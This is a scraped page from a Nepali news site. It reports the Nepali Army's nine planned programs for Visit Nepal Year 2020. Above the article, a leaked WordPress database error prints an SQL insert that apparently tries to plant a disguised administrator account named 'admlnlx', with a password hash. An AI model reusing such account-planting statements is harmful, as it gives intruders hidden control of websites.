WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDI.uS10HGJIXsTAd31ni3JGpXAyb8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 17:57:33', '', 'admlnlx', 'admlnlx')

भ्रमण वर्ष २०२० को अवसरमा नेपाली सेनाले ९ वटा कार्यक्रम गर्दै – Gaule Khabar

भ्रमण वर्ष २०२० को अवसरमा नेपाली सेनाले ९ वटा कार्यक्रम गर्दै

भ्रमण वर्ष २०२० को अवसरमा नेपाली सेनाले ९ वटा कार्यक्रम गर्दै

गाउँले न्युज, नेपाल भ्रमण वर्ष २०२० को अवसरमा नेपाली सेनाले पर्यटन प्रवद्र्धनसम्बन्धी विभिन्न ९ वटा कार्यक्रम गर्ने भएको छ ।
नेपाली सेनाले एभरेस्ट एक्सपिडिसन तथा क्लियरिङ क्याम्पेन, जंगल सफारी, माउन्टेन ट्रेकिङ, नेपाल म्याराथन, पिस सेमिनार तथा रन फर फन कार्यक्रम, एकीकरण पदयात्रा कार्यक्रम गर्ने जनाएको छ ।
त्यस्तै प्याराग्लाइडिङ, लिगलिगकोट दौड र ओपन एडभेन्चर कार्यक्रम पनि गर्ने नेपाली सेनाले जनाएको छ ।

sourse:shikharpost

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका